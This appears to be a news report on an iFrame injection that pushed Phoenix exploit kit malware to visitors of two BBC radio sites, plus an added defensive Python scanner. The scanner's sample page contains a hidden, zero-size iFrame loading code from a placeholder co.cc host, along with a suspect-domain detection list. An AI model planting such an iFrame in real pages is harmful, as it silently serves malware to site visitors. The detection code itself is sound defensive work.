Two BBC sites serving malware via injected iFrame

A piece of malware detected by only 21 percent of the anti-virus solutions used by VirusTotal is currently being pushed onto unsuspecting visitors of the BBC 6 Music and BBC 1Xtra radio station websites.

The visitor doesn't have to do anything except land on the website to become a victim of a so-called drive-by download attack, since the websites have been injected with an iFrame that automatically loads the malicious code from a website parked on a co.cc domain.

According to Websense’s experts, the payload is delivered only the first time the user visits the site.

“The code that is delivered to end users utilizes exploits delivered by the Phoenix exploit kit. A malicious binary is ultimately delivered to the end user,” they say, and add that the attack is part of a current mass-injection targeting vulnerable Web sites.
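The injection described above is a hidden iFrame added to a legitimate page whose source points at an off-site host. As an added example (not code from the original article, from the BBC, or from Websense), the following Python script scans a page's HTML for iFrames that are off-site, hidden (zero-sized or styled `display:none`), or hosted on a co.cc-style free subdomain. The sample page, the `example-radio.test` site hostnames, and the co.cc hostname in it are constructed placeholders, not real indicators from the incident.

```python
"""Flag iframes that look like drive-by injections in a page's HTML.

Added example, not from the original article: parses <iframe> tags and
reports those that are off-site, hidden, or on a suspect TLD suffix.
All hostnames and the sample page below are constructed placeholders.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed: hostnames the site is expected to embed content from.
SITE_HOSTS = {"www.example-radio.test", "example-radio.test"}
# Free-subdomain suffix named in the article as hosting the injected code.
SUSPECT_SUFFIXES = (".co.cc",)

# Constructed sample page: one legitimate player iframe, one injected iframe.
SAMPLE_PAGE = """<html><body>
<h1>Radio station page</h1>
<iframe src="https://www.example-radio.test/player" width="400" height="300"></iframe>
<div>station content</div>
<iframe src="http://placeholder-injected.co.cc/in.php" width="0" height="0" style="display:none"></iframe>
</body></html>"""


class IframeCollector(HTMLParser):
    """Collects the attribute dicts of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _dimension(attrs, name):
    """Parse a width/height attribute as an integer pixel count, else None."""
    value = attrs.get(name, "").strip().lower().rstrip("px")
    try:
        return int(value)
    except ValueError:
        return None


def _is_hidden(attrs):
    """True if the iframe is styled invisible or sized to 1px or less."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    width, height = _dimension(attrs, "width"), _dimension(attrs, "height")
    return (width is not None and width <= 1) or (height is not None and height <= 1)


def find_suspicious_iframes(html, site_hosts=SITE_HOSTS):
    """Return a list of {'src': ..., 'reasons': [...]} for iframes worth review."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        reasons = []
        if host and host not in site_hosts:
            reasons.append("off-site src")
        if host.endswith(SUSPECT_SUFFIXES):
            reasons.append("suspect TLD")
        if _is_hidden(attrs):
            reasons.append("hidden")
        if reasons:
            findings.append({"src": src, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_iframes(SAMPLE_PAGE):
        print(finding["src"], "->", ", ".join(finding["reasons"]))
```

Run against the constructed sample, the legitimate player iframe produces no finding and the injected one is reported as off-site, on a suspect TLD, and hidden. In practice the scan should run on the HTML as served to visitors (including any server-side includes), since the article notes the exploit payload itself is handed out only on a visitor's first request and will not be visible in the page markup.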

“When someone like the Beeb gets infected by a malicious link, the potential for many innocent people to be affected by malware is huge,” points out Websense Security Labs senior manager Carl Leonard. “Modern threats target places where they will find good traffic which is why we found that 80% of the malicious sites we saw last year were actually legitimate sites that had been compromised.”